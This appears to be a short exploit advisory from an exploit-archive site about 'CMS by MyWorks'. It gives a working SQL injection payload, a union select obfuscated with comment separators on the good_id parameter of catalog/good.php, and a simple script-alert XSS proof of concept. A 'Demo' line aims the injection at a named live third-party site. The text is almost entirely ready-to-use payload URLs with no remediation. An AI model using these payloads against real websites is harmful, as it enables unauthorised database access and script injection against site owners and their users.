CMS By MyWorks suffers from cross site scripting and remote SQL injection vulnerabilities.
5291bb167a3c4e36f5af3d5acc642b8d6f094baf3bbe4840f796a532f0841763
CMS by MyWorks SQL/ XSS Vulnerability
========================================================
####################################################################
# Author : Palyo34
# Home : www.1923Turk.com
# Script : CMS by MyWorks
# Script site: https://www.myworks.spb.ru/
####################################################################
===[ Exploit ]===
https://server/catalog/good.php?good_id= SQL INJECTION
1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12
Demo:
https://happyday-spb.ru/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12
###################################################################
===[XSS Vulnerability]===
https://server/catalog/good.php?good_id=
https://server/catalog/good.php?good_id=164<script>alert("XSS")</script>